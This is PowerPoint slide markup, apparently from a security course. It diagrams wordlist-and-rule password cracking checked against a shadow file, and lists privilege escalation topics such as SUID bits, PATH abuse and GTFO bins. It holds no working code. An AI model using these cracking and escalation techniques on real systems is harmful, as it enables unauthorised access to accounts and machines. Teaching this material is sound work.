                </a:solidFill>
              </a:rPr>
              <a:t>ilovedogs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="34000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E421CE-12EF-8B42-943C-D9928A742CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5265950"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pa$$w0rd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82B32F8-988C-4845-86F3-CB97DEDE18E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5589245"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sportball3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0336E61F-96D6-8940-A0BE-582A6A3E6120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Wordlist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A12F6002-CC76-EB40-BF41-08AB840FDCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6403073" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Rule list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E6C803-263C-0946-8DD3-C89F5ACECEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8218619" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0A92BD-C8DF-D948-BDA0-F67840BBBB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10300559" y="3798102"/>
            <a:ext cx="941534" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326A4514-1762-4847-9E6D-0C49F16716C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335621" y="4508260"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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3F1055-8580-A341-B76B-5B1981AF066F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8167510" y="4483188"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="2600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7E5126C-EE55-3B42-854C-3429EBEF7EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294081" y="4960710"/>
            <a:ext cx="1642516" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>append #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82621CD-73A9-0647-ABA3-3F0C561AEFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8158996" y="4601976"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>md5 + salt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDC6B83-D39D-8F45-A190-76FBDF44B530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292494" y="5295302"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>prepend #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1377CF9-4407-3346-8296-EAE984BA4229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292493" y="5681578"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*04 +0 '4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE28DDD6-A240-EA48-BC28-02F2B28B6656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292495" y="4335575"/>
            <a:ext cx="1526598" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Z5 *75 '5 { O02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Cross 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFB0114-1999-1243-99E0-54E76A8088D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067075" y="5076571"/>
            <a:ext cx="198082" cy="209092"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 38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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5D00EB-4369-DC44-B52F-6F0CFAABA050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876953" y="5056858"/>
            <a:ext cx="198082" cy="209092"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 38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D1ACC25-5599-034C-825D-3F80CCA4BF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8152070" y="4956715"/>
            <a:ext cx="1531937" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>md5crypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B08725-6433-E549-8CCF-9085679A77F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285568" y="4639297"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>flip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32EABCF-E11A-7142-B03E-B6D7786F0818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8165922" y="5293813"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LANMAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3311883-B29D-7D4E-B530-B83D1E6AE2A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197487" y="5669865"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Salted-SHA1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4D332A-F2AE-F048-BCE1-9692A0890E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8166898" y="4322555"/>
            <a:ext cx="1533524" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sha256crypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AF7595-9C03-2845-9E6B-BB1035AAE63A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8131384" y="4951899"/>
            <a:ext cx="1552623" cy="390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Equal 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9ED53E-DF91-8747-81AB-21F840527C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9722878" y="5014139"/>
            <a:ext cx="334130" cy="28025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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99382E27-F878-D04C-A9A5-913DDBD96D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10111318" y="4839352"/>
            <a:ext cx="1450840" cy="57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Generated Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{865CA1D2-28FA-0F45-9492-5923EE2C2354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10066426" y="4263527"/>
            <a:ext cx="1450840" cy="546804"/>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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compare with Shadow file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BF44CA6-D36A-5246-939A-239C4105E231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10073062" y="5483844"/>
            <a:ext cx="1795088" cy="589289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="92500"/>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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If matched: password cracked!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="46" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C318EE3-2416-AF46-827C-CC956FFE20C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795921522"/>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412219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CFBE075-A9D6-4642-A4EF-5015BCE88301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="516835"/>
            <a:ext cx="4472230" cy="1666501"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 19">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23FBA8-8D99-B74F-832C-54523A1F8AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="2546224"/>
            <a:ext cx="4623257" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once you are on a target machine, you want to have the highest possible privileges. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command filter bypassing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting permission configurations (GTFO bins)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUID bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
